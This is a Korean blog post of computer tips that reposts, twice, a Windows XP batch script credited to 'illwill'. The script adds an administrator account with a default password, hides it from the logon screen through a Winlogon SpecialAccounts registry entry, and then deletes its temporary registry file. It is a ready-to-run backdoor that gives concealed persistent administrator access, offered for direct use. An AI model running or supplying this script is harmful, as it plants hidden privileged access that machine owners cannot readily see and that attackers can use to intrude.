HideUserXP.bat
# by illwill http://illmob.org
# This will create a hidden user with admin rights in XP
# ( hidden meaning that the username wont appear in the logon screen,
# other users can still see its profile in C:\Documents and Settings etc..)
# To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.
# Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [Hkey_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
EXIT
# by illwill http://illmob.org
# This will create a hidden user with admin rights in XP
# ( hidden meaning that the username wont appear in the logon screen,
# other users can still see its profile in C:\Documents and Settings etc..)
# To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice.
# Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [Hkey_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
EXIT
'컴퓨터 사용 팁' 카테고리의 다른 글
HTML Redirect (0) | 2008.11.03 |
---|---|
자동 로그인을 위한 USER 관리창 (0) | 2008.10.27 |
네트웍 공유 접속시 사용자이름이 비활성화 돼고 Guest로만 로긴 될때 (0) | 2008.06.03 |
이동식 디스크 드라이브명 바꾸는 법 (1) | 2008.04.12 |
MeGUI을 이용한 핸드폰 고화질 인코딩 (1) | 2007.09.15 |